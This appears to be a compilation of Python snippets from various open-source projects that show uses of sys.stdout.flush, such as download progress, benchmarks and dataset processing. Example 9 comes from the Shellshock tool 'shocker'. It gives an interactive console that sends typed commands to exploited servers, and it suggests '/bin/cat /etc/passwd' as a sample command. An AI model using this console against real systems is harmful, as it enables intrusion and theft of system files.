                    # export http_proxy=http://proxyservername.mycompany.com:911
                    # export ftp_proxy=http://proxyservername.mycompany.com:911

                    if not completed and os.path.exists(local_file):
                        md5_pass = self.checkHash(fdata)
                        if md5_pass:
                            print '[md5 match]',
                        else:
                            print '[md5 mismatch]',
                        sys.stdout.flush()
                        completed = md5_pass

                    if completed:
                        print '[done]'
                        break
                    else:
                        print '[failed]'
                        print '  Tried to retrieve', url
                        print '  to', local_file
                        print 'Possible fixes:'
                        print '* If you are behind a web-proxy, try setting the',
                        print 'http_proxy environment variable'
                        print '* You can try to download this file separately',
                        print 'and rerun this script'
                        raise Exception()
                
                except KeyboardInterrupt:
                    print '[KeyboardInterrupt]'
                    return False

                except Exception, e:
                    print e

            if not completed: return False

        return True

Example 7

Project: ten-tips-for-pythonic-code-jetbrains-webcast Source File: a_dicts_for_perf.py
Function: main
def main():
    # #############################
    print("Creating data...", end=' ')
    sys.stdout.flush()

    data_list = []
    random.seed(0)
    for d_id in range(500000):
        x = random.randint(0, 1000)
        y = random.randint(0, 1000)
        temp = random.randint(-10, 50)
        quality = random.random()
        data_list.append(DataPoint(d_id, x, y, temp, quality))

    print("done.")
    sys.stdout.flush()

    # #############################
    print("Simulating randomized data ...", end=' ')
    sys.stdout.flush()

    data_list.sort(key=lambda d: d.quality)

    print("done.")

    # Create a list of random IDs to locate without duplication
    interesting_ids = list({random.randint(0, len(data_list)) for _ in range(0, 100)})
    print("Creating {} interesting IDs to seek.".format(len(interesting_ids)))

    # #############################
    print("Locating data in list...", end=' ')
    sys.stdout.flush()

    t0 = datetime.datetime.now()
    interesting_points = []
    for i in interesting_ids:
        pt = find_point_by_id_in_list(data_list, i)
        interesting_points.append(pt)

    t1 = datetime.datetime.now()
    dt_list = (t1 - t0).total_seconds()

    print("done.")
    sys.stdout.flush()

    print("DT: {} sec".format(dt_list))
    print(interesting_points)

    # #############################
    t0 = datetime.datetime.now()

    print("Creating dictionary...", end='')
    data_lookup = {d.id: d for d in data_list}

    print("done.")
    sys.stdout.flush()

    print("Locating data in dictionary...", end=' ')
    sys.stdout.flush()

    #    t0 = datetime.datetime.now()
    interesting_points = []
    for i in interesting_ids:
        item = data_lookup[i]
        interesting_points.append(item)

    t1 = datetime.datetime.now()
    dt_dict = (t1 - t0).total_seconds()

    print("done.")
    sys.stdout.flush()

    print("DT: {} sec".format(dt_dict))
    print(interesting_points)
    print()
    print("Speedup from dict: {:,.0f}x".format(round(dt_list / dt_dict)))

Example 8

Project: nrvr-commander Source File: cygwin.py
    @classmethod
    def forArch(cls, arch, packageDirs,
                force=False, mirror="http://mirrors.kernel.org/sourceware/cygwin/",
                noWait=False,
                dontDownload=False,
                ticker=True):
        """Download files or use previously downloaded files.
        
        As implemented uses wget.
        That has been a choice of convenience, could be written in Python instead.
        
        arch
            32 or 64.
        
        packageDirs
            a list of directories needed.
            
            You don't want to download all of Cygwin, only what is needed.
        
        force
            whether to force downloading even if apparently downloaded already.
            
            May be useful for programmatically updating at times.
        
        mirror
            URL of mirror to download from.
        
        noWait
            whether to forgo short waits between files.
            
            Be warned that frequent high use of bandwidth may be penalized by a server
            by refusal to serve anything at all to a specific client address or range of
            addresses.
        
        dontDownload
            whether you don't want to start a download, for some reason.
        
        Return directory path."""
        arch = Arch(arch)
        installerName = cls.installerName(arch)
        if arch == Arch(32):
            archPath = "x86"
        elif arch == Arch(64):
            archPath = "x86_64"
        else:
            raise Exception("unknown architecture arch=%s" % (arch))
        downloadDir = ScriptUser.loggedIn.userHomeRelative("Downloads")
        archDir = cls.basename(arch)
        downloadDir = os.path.join(downloadDir, archDir)
        semaphorePath = downloadDir + cls.semaphoreExtenstion
        #
        if os.path.exists(downloadDir) and not force:
            if not os.path.exists(semaphorePath):
                # directory exists and not download in progress,
                # assume it is good
                return downloadDir
            else:
                # directory exists and download in progress,
                # presumably from another script running in another process or thread,
                # wait for it to complete
                printed = False
                ticked = False
                # check the essential condition, initially and then repeatedly
                while os.path.exists(semaphorePath):
                    if not printed:
                        # first time only printing
                        print "waiting for " + semaphorePath + " to go away on completion"
                        sys.stdout.flush()
                        printed = True
                    if ticker:
                        if not ticked:
                            # first time only printing
                            sys.stdout.write("[")
                        sys.stdout.write(".")
                        sys.stdout.flush()
                        ticked = True
                    time.sleep(5)
                if ticked:
                    # final printing
                    sys.stdout.write("]\n")
                    sys.stdout.flush()
        elif not dontDownload: # it is normal to download
            if not os.path.exists(downloadDir):
                try:
                    os.makedirs(downloadDir)
                except OSError:
                    if os.path.exists(downloadDir): # concurrently made
                        pass
                    else: # failure
                        raise
            #
            # try downloading
            pid = os.getpid()
            try:
                with open(semaphorePath, "w") as semaphoreFile:
                    # create semaphore file
                    semaphoreFile.write("pid=" + str(pid))
                #
                print "starting to download " + archDir
                if ticker:
                    sys.stdout.write("[.")
                    sys.stdout.flush()
                try:
                    installerUrl = "http://cygwin.com/" + installerName
                    wget = CommandCapture(
                        ["wget",
                         "--quiet",
                         "--timestamping",
                         "-P", downloadDir,
                         installerUrl],
                        forgoPty=True)
                    #
                    if ticker:
                        sys.stdout.write(".")
                        sys.stdout.flush()
                    downloadPathRoot = posixpath.join(mirror, archPath) + "/"
                    downloadPathRootDepth = cls._directoryDepth(downloadPathRoot)
                    rejectList = "index.html*,*-src.tar.bz2,*-devel,*-devel-*,*-debuginfo,*-debuginfo-*"
                    wgetArgs = [
                        "wget",
                        "--quiet",
                        "--timestamping",
                        "--recursive",
                        "--no-host-directories",
                        "--cut-dirs", str(downloadPathRootDepth),
                        "--ignore-case",
                        "--reject", rejectList,
                        "-P", downloadDir,
                        "--no-parent",
                        "--level=1",
                        "-e", "robots=off",
                    ]
                    if not noWait:
                        wgetArgs.extend(["--wait=1", "--random-wait"])
                    wgetArgs.extend([downloadPathRoot])
                    wget = CommandCapture(wgetArgs, forgoPty=True)
                    #
                    downloadPackagesPath = posixpath.join(downloadPathRoot, "release") + "/"
                    #wildcardRegex = re.compile(r"^(.*)/([^/]*\*)$")
                    for packageDir in packageDirs:
                        if ticker:
                            sys.stdout.write(".")
                            sys.stdout.flush()
                        if not isinstance(packageDir, (tuple, list)): # e.g. "bash"
                            level = 1
                        else: # e.g. ("openssl", 2)
                            level = packageDir[1]
                            packageDir = packageDir[0]
                        downloadPath = posixpath.join(downloadPackagesPath, packageDir) + "/"
                        wgetArgs = [
                            "wget",
                            "--quiet",
                            "--timestamping",
                            "--recursive",
                            "--no-host-directories",
                            "--cut-dirs", str(downloadPathRootDepth),
                            "--ignore-case",
                            "--reject", rejectList,
                            "-P", downloadDir,
                            "--no-parent",
                            "--level", str(level),
                            "-e", "robots=off",
                        ]
                        if not noWait:
                            wgetArgs.extend(["--wait=1", "--random-wait"])
                        wgetArgs.extend([downloadPath])
                        wget = CommandCapture(wgetArgs, forgoPty=True)
                    if ticker:
                        sys.stdout.write("]")
                        sys.stdout.flush()
                finally:
                    if ticker:
                        sys.stdout.write("\n")
                        sys.stdout.flush()
            except: # apparently a problem
                print "problem downloading " + archDir
                raise
            else:
                print "done downloading " + archDir
            finally:
                try:
                    # delete semaphore file
                    os.remove(semaphorePath)
                except:
                    pass
        if os.path.exists(downloadDir):
            # directory exists now, assume it is good
            return downloadDir
        else:
            # apparently download has failed
            raise IOError("directory not found " + downloadDir)

Example 9

Project: shocker Source File: shocker.py
def ask_for_console(proxy, successful_targets, verbose):
    """ With any discovered vulnerable servers asks user if they
    would like to choose one of these to send further commands to
    in a semi interactive way
    successful_targets is a dictionary:
    {url: (header, exploit)}
    """

    # Initialise to non zero to enter while loop
    user_input = 1
    ordered_url_list = successful_targets.keys()
    
    while user_input != 0:
        result = ""
        print "[+] The following URLs appear to be exploitable:"
        for x in range(len(ordered_url_list)):
            print "  [%i] %s" % (x+1, ordered_url_list[x])
        print "[+] Would you like to exploit further?"
        user_input = raw_input("[>] Enter an URL number or 0 to exit: ")
        sys.stdout.flush()
        try:
            user_input = int(user_input)
        except:
            continue
        if user_input not in range(len(successful_targets)+1):
            print "[-] Please enter a number between 1 and %i (0 to exit)" % \
                                                            len(successful_targets)
            continue
        elif not user_input:
            continue
        target = ordered_url_list[user_input-1]
        header = successful_targets[target][0]
        print "[+] Entering interactive mode for %s" % target
        print "[+] Enter commands (e.g. /bin/cat /etc/passwd) or 'quit'"

        while True:
            command = ""
            result = ""
            sys.stdout.flush()
            command = raw_input("  > ")
            sys.stdout.flush()
            if command == "quit":
                sys.stdout.flush()
                print "[+] Exiting interactive mode..."
                sys.stdout.flush()
                break
            if command:
                attack = successful_targets[target][1] + command
                result = do_attack(proxy, target, header, attack, verbose)
            else:
                result = ""
            if result: 
                buf = StringIO.StringIO(result)
                for line in buf:
                    sys.stdout.flush()
                    print "  < %s" % line.strip()
                    sys.stdout.flush()
            else:
                sys.stdout.flush()
                print "  > No response"
                sys.stdout.flush()

Example 10

Project: pyNastran Source File: map_loads.py
    def build_mapping_matrix(self, debug=False):
        """
        Skips building the matrix if it already exists
        A mapping matrix translates element ID to loads on the nearby
        structural nodes.

        eid,distribution
        """
        if self.mapping_matrix != {}:
            return self.mapping_matrix

        log.info("---starting build_mapping_matrix---")
        #print("self.mapping_matrix = ",self.mapping_matrix)
        if os.path.exists('mappingMatrix.new.out'):
            self.mapping_matrix = self.parseMapFile('mappingMatrix.new.out')
            log.info("---finished build_mapping_matrix based on mappingMatrix.new.out---")
            sys.stdout.flush()
            return self.mapping_matrix
        log.info("...couldn't find 'mappingMatrix.new.out' in %r, so going to make it..." % os.getcwd())

        # this is the else...
        log.info("creating...")
        aero_model = self.aero_model
        structural_model = self.structural_model

        #aNodes = aero_model.getNodes()
        #sNodes = structural_model.getNodes()
        #treeObj = Tree(nClose=5)
        #tree    = treeObj.buildTree(aNodes,sNodes) # fromNodes,toNodes

        aElementIDs = aero_model.ElementIDs() # list
        sElementIDs = structural_model.getElementIDsWithPIDs() # list
        sElementIDs2 = structural_model.ElementIDs() # list

        msg = "there are no internal elements in the structural model?\n   ...len(sElementIDs)=%s len(sElementIDs2)=%s" % (
            len(sElementIDs), len(sElementIDs2))
        assert sElementIDs != sElementIDs2, msg
        log.info("maxAeroID=%s maxStructuralID=%s sElements=%s" % (max(aElementIDs), max(sElementIDs), len(sElementIDs2)))

        log.info("build_centroids - structural")
        sCentroids = self.build_centroids(structural_model, sElementIDs)
        self.build_centroid_tree(sCentroids)
        #self.buildNodalTree(sNodes)

        log.info("build_centroids - aero")
        aero_centroids = self.build_centroids(aero_model)

        with open('mappingMatrix.out', 'wb') as map_file:
            map_file.write('# aEID distribution (sEID:  weight)\n')

            t0 = time()
            nAeroElements = float(len(aElementIDs))
            log.info("---start piercing---")
            if debug:
                log.info("nAeroElements = %s" % nAeroElements)
            tEst = 1.
            tLeft = 1.
            percent_done = 0.

            if 1:
                num_cpus = 4
                pool = mp.Pool(num_cpus)
                result = pool.imap(self.map_loads_mp_func,
                                   [(aEID, aero_model) for aEID in aElementIDs])

                for j, return_values in enumerate(result):
                    aEID, distribution = return_values
                    #self.mappingMatrix[aEID] = distribution
                    map_file.write('%s %s\n' % (aEID, distribution))
                pool.close()
                pool.join()
            else:
                for (i, aero_eid) in enumerate(aElementIDs):
                    if i % 1000 == 0 and debug:
                        log.debug('  piercing %sth element' % i)
                        log.debug("tEst=%g minutes; tLeft=%g minutes; %.3f%% done" % (
                            tEst, tLeft, percent_done))
                        sys.stdout.flush()

                    aElement = aero_model.Element(aero_eid)
                    (aArea, aCentroid, aNormal) = aero_model.get_element_properties(aero_eid)
                    percentDone = i / nAeroElements * 100
                    if debug:
                        log.info('aEID=%s percentDone=%.2f aElement=%s aArea=%s aCentroid=%s aNormal=%s' %(
                            aero_eid, percentDone, aElement, aArea, aCentroid, aNormal))
                    pSource = aCentroid
                    (distribution) = self.pierce_elements(aCentroid, aero_eid, pSource, aNormal)
                    #(distribution)  = self.poorMansMapping(aCentroid, aero_eid, pSource, aNormal)
                    self.mapping_matrix[aero_eid] = distribution
                    map_file.write('%s %s\n' % (aero_eid, distribution))

                    dt = (time() - t0) / 60.
                    tEst = dt * nAeroElements / (i + 1)  # dtPerElement*nElements
                    tLeft = tEst - dt
                    percent_done = dt / tEst * 100.

        log.info("---finish piercing---")
        self.run_map_test(self.mapping_matrix)
        #print("mapping_matrix = ", self.mapping_matrix)
        log.info("---finished build_mapping_matrix---")
        sys.stdout.flush()
        return self.mapping_matrix

Example 11

Project: reseg Source File: helper_dataset.py
def preprocess_dataset(train, valid, test,
                       input_to_float,
                       preprocess_type,
                       patch_size, max_patches):

    if input_to_float and preprocess_type is None:
        train_norm = train[0].astype(floatX) / 255.
        train = (train_norm, train[1])
        valid_norm = valid[0].astype(floatX) / 255.
        valid = (valid_norm, valid[1])
        test_norm = test[0].astype(floatX) / 255.
        test = (test_norm, test[1])

    if preprocess_type is None:
        return train, valid, test

    # whiten, LCN, GCN, Local Mean Subtract, or normalize
    if len(train[0]) > 0:
        train_pre = []
        print ""
        print "Preprocessing {} images of the train set with {} {} ".format(
            len(train[0]), preprocess_type, patch_size),
        print ""
        i = 0
        print "Progress: {0:.3g} %".format(i * 100 / len(train[0])),
        for i, x in enumerate(train[0]):
            img = np.expand_dims(x, axis=0)
            x_pre = preprocess(img, preprocess_type,
                               patch_size,
                               max_patches)
            train_pre.append(x_pre[0])
            print "\rProgress: {0:.3g} %".format(i * 100 / len(train[0])),
            sys.stdout.flush()

        if input_to_float:
            train_pre = np.array(train_pre).astype(floatX) / 255.
        train = (np.array(train_pre), np.array(train[1]))

    if len(valid[0]) > 0:
        valid_pre = []
        print ""
        print "Preprocessing {} images of the valid set with {} {} ".format(
            len(valid[0]), preprocess_type, patch_size),
        print ""
        i = 0
        print "Progress: {0:.3g} %".format(i * 100 / len(valid[0])),
        for i, x in enumerate(valid[0]):
            img = np.expand_dims(x, axis=0)
            x_pre = preprocess(img, preprocess_type,
                               patch_size,
                               max_patches)
            valid_pre.append(x_pre[0])
            print "\rProgress: {0:.3g} %".format(i * 100 / len(valid[0])),
            sys.stdout.flush()

        if input_to_float:
            valid_pre = np.array(valid_pre).astype(floatX) / 255.
        valid = (np.array(valid_pre), np.array(valid[1]))

    if len(test[0]) > 0:
        test_pre = []
        print ""
        print "Preprocessing {} images of the test set with {} {} ".format(
            len(test[0]), preprocess_type, patch_size),
        print ""
        i = 0
        print "Progress: {0:.3g} %".format(i * 100 / len(test[0])),
        for i, x in enumerate(test[0]):
            img = np.expand_dims(x, axis=0)
            x_pre = preprocess(img, preprocess_type,
                               patch_size,
                               max_patches)
            test_pre.append(x_pre[0])
            print "\rProgress: {0:.3g} %".format(i * 100 / len(test[0])),
            sys.stdout.flush()

        if input_to_float:
            test_pre = np.array(test_pre).astype(floatX) / 255.
        test = (np.array(test_pre), np.array(test[1]))

    return train, valid, test

Example 12

Project: pyzui Source File: benchmark.py
Function: benchmark
def benchmark(filename, ppmfile):
    print "Benchmarking %s ..." % os.path.basename(filename)

    base_mem = mem()

    ## conversion
    c = MagickConverter(filename, ppmfile)
    start_time = time.time()
    print "Converting to PPM...",
    sys.stdout.flush()
    c.run()
    end_time = time.time()
    print "Done: took %.2fs" % (end_time - start_time)
    del c

    ## metadata
    f = open(ppmfile, 'rb')
    w,h = read_ppm_header(f)
    f.close()
    print "Dimensions: %dx%d, %.2f megapixels" % (w, h, w * h * 1e-6)
    del f, w, h

    ## tiling
    t = PPMTiler(ppmfile)
    start_time = time.time()
    print "Tiling...",
    sys.stdout.flush()
    t.run()
    end_time = time.time()

    ## in general, python doesn't necessarily return allocated memory to the OS
    ## (see <http://effbot.org/pyfaq/
    ## why-doesnt-python-release-the-memory-when-i-delete-a-large-object.htm>)
    ## so the current memory usage is likely to be approximately equal to the
    ## peak memory usage during tiling
    ## however, it would probably be better to periodically check memory usage
    ## while the tiler is running and maintain a max value
    end_mem = mem()

    print "Done: took %.2fs consuming %.2fMB RAM" % \
        ((end_time - start_time), (end_mem - base_mem) * 1e-3)
    del t

    ## zooming
    viewport_w = 800
    viewport_h = 600
    print "Viewport: %dx%d" % (viewport_w, viewport_h)
    zoom_amount = 5.0
    print "Zoom amount: %.1f" % zoom_amount

    qzui = QZUI()
    qzui.framerate = None
    qzui.resize(viewport_w, viewport_h)
    qzui.show()

    scene = Scene.new()
    qzui.scene = scene
    obj = TiledMediaObject(ppmfile, scene, True)
    scene.add(obj)
    obj.fit((0, 0, viewport_w, viewport_h))

    start_time = time.time()
    print "Zooming (cold)...",
    sys.stdout.flush()
    num_frames = 100
    for i in xrange(num_frames):
        qzui.repaint()
        scene.centre = (viewport_w/2, viewport_h/2)
        scene.zoom(zoom_amount/num_frames)
    end_time = time.time()
    print "Done: %d frames took %.2fs, mean framerate %.2f FPS" % \
        (num_frames, (end_time - start_time),
        num_frames / (end_time - start_time))

    scene.zoom(-zoom_amount)
    start_time = time.time()
    print "Zooming (warm)...",
    sys.stdout.flush()
    num_frames = 100
    for i in xrange(num_frames):
        qzui.repaint()
        scene.centre = (viewport_w/2, viewport_h/2)
        scene.zoom(zoom_amount/num_frames)
    end_time = time.time()
    print "Done: %d frames took %.2fs, mean framerate %.2f FPS" % \
        (num_frames, (end_time - start_time),
        num_frames / (end_time - start_time))
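
The comment in the tiling section notes that a single memory reading taken after the run only approximates the peak, and that sampling memory periodically while the tiler runs and keeping the maximum would be more accurate. A rough, Linux-only sketch of such a sampler (it reads VmRSS from /proc/self/status; none of this is part of pyzui):

import threading
import time

def rss_kb():
    # current resident set size in kB, Linux-specific (/proc)
    with open('/proc/self/status') as f:
        for line in f:
            if line.startswith('VmRSS:'):
                return int(line.split()[1])
    return 0

class PeakMemSampler(threading.Thread):
    """Poll RSS in the background and remember the maximum value seen."""
    def __init__(self, interval=0.1):
        super(PeakMemSampler, self).__init__()
        self.daemon = True
        self.interval = interval
        self.peak_kb = 0
        self._stop_event = threading.Event()

    def run(self):
        while not self._stop_event.is_set():
            self.peak_kb = max(self.peak_kb, rss_kb())
            time.sleep(self.interval)

    def stop(self):
        self._stop_event.set()
        self.join()

sampler = PeakMemSampler()
sampler.start()
# ... run the tiler (or any other memory-hungry step) here ...
sampler.stop()
print('Peak RSS during run: %.2f MB' % (sampler.peak_kb / 1024.0))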

Example 13

Project: models Source File: build_imagenet_data.py
def _process_image_files_batch(coder, thread_index, ranges, name, filenames,
                               synsets, labels, humans, bboxes, num_shards):
  """Processes and saves list of images as TFRecord in 1 thread.

  Args:
    coder: instance of ImageCoder to provide TensorFlow image coding utils.
    thread_index: integer, unique batch to run index is within [0, len(ranges)).
    ranges: list of pairs of integers specifying ranges of each batches to
      analyze in parallel.
    name: string, unique identifier specifying the data set
    filenames: list of strings; each string is a path to an image file
    synsets: list of strings; each string is a unique WordNet ID
    labels: list of integer; each integer identifies the ground truth
    humans: list of strings; each string is a human-readable label
    bboxes: list of bounding boxes for each image. Note that each entry in this
      list might contain from 0+ entries corresponding to the number of bounding
      box annotations for the image.
    num_shards: integer number of shards for this data set.
  """
  # Each thread produces N shards where N = int(num_shards / num_threads).
  # For instance, if num_shards = 128, and the num_threads = 2, then the first
  # thread would produce shards [0, 64).
  num_threads = len(ranges)
  assert not num_shards % num_threads
  num_shards_per_batch = int(num_shards / num_threads)

  shard_ranges = np.linspace(ranges[thread_index][0],
                             ranges[thread_index][1],
                             num_shards_per_batch + 1).astype(int)
  num_files_in_thread = ranges[thread_index][1] - ranges[thread_index][0]

  counter = 0
  for s in xrange(num_shards_per_batch):
    # Generate a sharded version of the file name, e.g. 'train-00002-of-00010'
    shard = thread_index * num_shards_per_batch + s
    output_filename = '%s-%.5d-of-%.5d' % (name, shard, num_shards)
    output_file = os.path.join(FLAGS.output_directory, output_filename)
    writer = tf.python_io.TFRecordWriter(output_file)

    shard_counter = 0
    files_in_shard = np.arange(shard_ranges[s], shard_ranges[s + 1], dtype=int)
    for i in files_in_shard:
      filename = filenames[i]
      label = labels[i]
      synset = synsets[i]
      human = humans[i]
      bbox = bboxes[i]

      image_buffer, height, width = _process_image(filename, coder)

      example = _convert_to_example(filename, image_buffer, label,
                                    synset, human, bbox,
                                    height, width)
      writer.write(example.SerializeToString())
      shard_counter += 1
      counter += 1

      if not counter % 1000:
        print('%s [thread %d]: Processed %d of %d images in thread batch.' %
              (datetime.now(), thread_index, counter, num_files_in_thread))
        sys.stdout.flush()

    writer.close()
    print('%s [thread %d]: Wrote %d images to %s' %
          (datetime.now(), thread_index, shard_counter, output_file))
    sys.stdout.flush()
    shard_counter = 0
  print('%s [thread %d]: Wrote %d images to %d shards.' %
        (datetime.now(), thread_index, counter, num_files_in_thread))
  sys.stdout.flush()
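
The batch writer prints a milestone every 1000 images and flushes so that progress from several worker threads shows up promptly instead of sitting in each stdio buffer. On Python 3.3+, print()'s flush keyword has the same effect as the explicit call; a small side-by-side sketch, separate from the TensorFlow models code:

import sys
from datetime import datetime

def report(thread_index, counter, total):
    # explicit flush, as in the snippet above
    print('%s [thread %d]: Processed %d of %d images in thread batch.' %
          (datetime.now(), thread_index, counter, total))
    sys.stdout.flush()

def report_py3(thread_index, counter, total):
    # Python 3.3+: flush=True flushes the stream right after writing
    print('%s [thread %d]: Processed %d of %d images in thread batch.' %
          (datetime.now(), thread_index, counter, total), flush=True)

report(0, 1000, 5000)
report_py3(0, 2000, 5000)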

Example 14

Project: internetarchive Source File: files.py
Function: download
    def download(self, file_path=None, verbose=None, silent=None, ignore_existing=None,
                 checksum=None, destdir=None, retries=None, ignore_errors=None):
        """Download the file into the current working directory.

        :type file_path: str
        :param file_path: Download file to the given file_path.

        :type verbose: bool
        :param verbose: (optional) Turn on verbose output.

        :type silent: bool
        :param silent: (optional) Suppress all output.

        :type ignore_existing: bool
        :param ignore_existing: Overwrite local files if they already
                                exist.

        :type checksum: bool
        :param checksum: (optional) Skip downloading file based on checksum.

        :type destdir: str
        :param destdir: (optional) The directory to download files to.

        :type retries: int
        :param retries: (optional) The number of times to retry on failed
                        requests.

        :type ignore_errors: bool
        :param ignore_errors: (optional) Don't fail if a single file fails to
                              download, continue to download other files.

        :rtype: bool
        :returns: True if file was successfully downloaded.
        """
        verbose = False if verbose is None else verbose
        silent = False if silent is None else silent
        ignore_existing = False if ignore_existing is None else ignore_existing
        checksum = False if checksum is None else checksum
        retries = 2 if not retries else retries
        ignore_errors = False if not ignore_errors else ignore_errors

        self.item.session._mount_http_adapter(max_retries=retries)
        file_path = self.name if not file_path else file_path

        if destdir:
            if not os.path.exists(destdir):
                os.mkdir(destdir)
            if os.path.isfile(destdir):
                raise IOError('{} is not a directory!'.format(destdir))
            file_path = os.path.join(destdir, file_path)

        if os.path.exists(file_path):
            if ignore_existing:
                msg = 'skipping {0}, file already exists.'.format(file_path)
                log.info(msg)
                if verbose:
                    print(' ' + msg)
                elif silent is False:
                    print('.', end='')
                    sys.stdout.flush()
                return
            elif checksum:
                md5_sum = utils.get_md5(open(file_path, 'rb'))
                if md5_sum == self.md5:
                    msg = ('skipping {0}, '
                           'file already exists based on checksum.'.format(file_path))
                    log.info(msg)
                    if verbose:
                        print(' ' + msg)
                    elif silent is False:
                        print('.', end='')
                        sys.stdout.flush()
                    return
            else:
                st = os.stat(file_path)
                if (st.st_mtime == self.mtime) and (st.st_size == self.size) \
                        or self.name.endswith('_files.xml') and st.st_size != 0:
                    msg = ('skipping {0}, file already exists '
                           'based on length and date.'.format(file_path))
                    log.info(msg)
                    if verbose:
                        print(' ' + msg)
                    elif silent is False:
                        print('.', end='')
                        sys.stdout.flush()
                    return

        parent_dir = os.path.dirname(file_path)
        if parent_dir != '' and not os.path.exists(parent_dir):
            os.makedirs(parent_dir)

        try:
            response = self.item.session.get(self.url, stream=True, timeout=12)
            response.raise_for_status()

            chunk_size = 2048
            with open(file_path, 'wb') as f:
                for chunk in response.iter_content(chunk_size=chunk_size):
                    if chunk:
                        f.write(chunk)
                        f.flush()
        except (RetryError, HTTPError, ConnectTimeout,
                ConnectionError, socket.error, ReadTimeout) as exc:
            msg = ('error downloading file {0}, '
                   'exception raised: {1}'.format(file_path, exc))
            log.error(msg)
            if os.path.exists(file_path):
                os.remove(file_path)
            if verbose:
                print(' ' + msg)
            elif silent is False:
                print('e', end='')
                sys.stdout.flush()
            if ignore_errors is True:
                return False
            else:
                raise exc

        # Set mtime with mtime from files.xml.
        os.utime(file_path, (0, self.mtime))

        msg = 'downloaded {0}/{1} to {2}'.format(self.identifier,
                                                 self.name,
                                                 file_path)
        log.info(msg)
        if verbose:
            print(' ' + msg)
        elif silent is False:
            print('d', end='')
            sys.stdout.flush()
        return True
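
In non-verbose mode this method prints a single character per file ('d' for downloaded, 'e' for error, '.' for skipped) with end='', so nothing would reach the terminal until the next newline; the sys.stdout.flush() right after each marker is what makes the indicator appear file by file. A tiny sketch of the same idea with made-up file names:

import sys
import time

def download_all(names):
    for name in names:
        time.sleep(0.05)            # stand-in for the real download
        ok = not name.endswith('.bad')
        # one character per file, no newline, so flush to show it immediately
        print('d' if ok else 'e', end='')
        sys.stdout.flush()
    print()                         # newline after the row of markers

download_all(['a.txt', 'b.txt', 'c.bad', 'd.txt'])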

Example 15

Project: NIPAP Source File: bulk-string-replace.py
def replace(pattern, replacement):

    # Fetch prefixes matching the string to replace
    print "Fetching prefixes from NIPAP... ",
    sys.stdout.flush()
    n = 1
    prefix_list = []
    t0 = time.time()
    query = {
        'operator': 'or',
        'val1': {
            'operator': 'regex_match',
            'val1': 'description',
            'val2': pattern
        },
        'val2': {
            'operator': 'regex_match',
            'val1': 'node',
            'val2': pattern
        }
    }
    full_result = Prefix.search(query, { 'parents_depth': -1, 'max_result': BATCH_SIZE })
    prefix_result = full_result['result']
    prefix_list += prefix_result
    print len(prefix_list), 
    sys.stdout.flush()
    while len(prefix_result) == 100:
        full_result = Prefix.smart_search(pattern, { 'parents_depth': -1, 'max_result': BATCH_SIZE, 'offset': n * BATCH_SIZE })
        prefix_result = full_result['result']
        prefix_list += prefix_result
        print len(prefix_list), 
        sys.stdout.flush()
        n += 1

    t1 = time.time()
    print " done in %.1f seconds" % (t1 - t0)

    # Display list
    print_pattern = "%-2s%-14s%-2s%-30s%-20s%s"
    print "\n\nPrefixes to change:"
    print print_pattern % ("", "VRF", "", "Prefix", "Node", "Description")
    i_match = 0
    for i, prefix in enumerate(prefix_list):
        if prefix.match:
            print COLOR_RESET,
            print " -- %d --" % i
            color = COLOR_RED
        else:
            color = COLOR_RESET
            
        print (color + print_pattern) % (
            "-" if prefix.match else "",
            prefix.vrf.rt,
            prefix.type[0].upper(),
            (("  " * prefix.indent) + prefix.display_prefix)[:min([ len(prefix.display_prefix) + 2*prefix.indent, 30 ])],
            (prefix.node or '')[:min([ len(prefix.node or ''), 20 ])],
            (prefix.description or '')[:min([ len(prefix.description or ''), 900 ])]
        )
        if prefix.match:
            new_prefix_node = re.sub(pattern, replacement, (prefix.node or ''), flags=re.IGNORECASE)
            new_prefix_desc = re.sub(pattern, replacement, (prefix.description or ''), flags=re.IGNORECASE)
            print (COLOR_GREEN + print_pattern) % (
                "+",
                prefix.vrf.rt,
                prefix.type[0].upper(),
                ("  " * prefix.indent + prefix.display_prefix)[:min([ len(prefix.display_prefix) + 2*prefix.indent, 30 ])],
                new_prefix_node[:min([ len(new_prefix_node), 20 ])],
                new_prefix_desc[:min([ len(new_prefix_desc), 90 ])]
            )


    # reset colors
    print COLOR_RESET,

    # Perform action?
    print "Select replacements to perform"
    print "Enter comma-separated selection (eg. 5,7,10) or \"all\" for all prefixes."
    print "Prefix list with ! to invert selection (eg !5,7,10 to perform operation on all except the entered prefixes)"
    inp = raw_input("Selection: ").strip()

    if len(inp) == 0:
        print "Empty selection, quitting."
        sys.exit(0)

    invert = False
    if inp[0] == "!":
        inp = inp[1:]
        invert = True

    rename_all = False
    if inp == 'all':
        rename_all = True
        selection = []
    else:
        selection = inp.split(",")
        try:
            selection = map(lambda x: int(x.strip()), selection)
        except ValueError as e:
            print >> sys.stderr, "Could not parse selection: %s" % str(e)
            sys.exit(1)

    for i, prefix in enumerate(prefix_list):

        if prefix.match and ((invert and i not in selection) or (not invert and i in selection) or rename_all):
            if prefix.node is not None:
                prefix.node = re.sub(pattern, replacement, prefix.node, flags=re.IGNORECASE)
            if prefix.description is not None:
                prefix.description = re.sub(pattern, replacement, prefix.description, flags=re.IGNORECASE)

            print "Saving prefix %s..." % prefix.display_prefix
            prefix.save()
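
While paging through search results, the script keeps printing the growing prefix count on the same line (print with a trailing comma) and flushes after each batch so the user sees progress before the final "done in N seconds" line. A rough Python 3 sketch of that reporting loop, with a made-up fetch_page() standing in for the NIPAP Prefix.search calls:

import sys
import time

BATCH_SIZE = 100

def fetch_page(offset):
    # hypothetical stand-in for Prefix.search / Prefix.smart_search
    remaining = 250 - offset
    return list(range(min(BATCH_SIZE, max(remaining, 0))))

def fetch_all():
    print('Fetching prefixes... ', end='')
    sys.stdout.flush()
    results, offset, t0 = [], 0, time.time()
    while True:
        page = fetch_page(offset)
        results += page
        print(len(results), end=' ')
        sys.stdout.flush()          # show the growing count right away
        if len(page) < BATCH_SIZE:
            break
        offset += BATCH_SIZE
    print(' done in %.1f seconds' % (time.time() - t0))
    return results

fetch_all()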

Example 16

Project: acousticbrainz-server Source File: hl_calc.py
def main(num_threads):
    print("High-level extractor daemon starting with %d threads" % num_threads)
    sys.stdout.flush()
    build_sha1 = get_build_sha1(HIGH_LEVEL_EXTRACTOR_BINARY)
    create_profile(PROFILE_CONF_TEMPLATE, PROFILE_CONF, build_sha1)
    db.init_db_engine(config.SQLALCHEMY_DATABASE_URI)

    num_processed = 0

    pool = {}
    docs = []
    while True:
        # Check to see if we need more database rows
        if len(docs) == 0:
            # Fetch more rows from the DB
            docs = db.data.get_unprocessed_highlevel_documents()

            # We will fetch some rows that are already in progress. Remove those.
            in_progress = pool.keys()
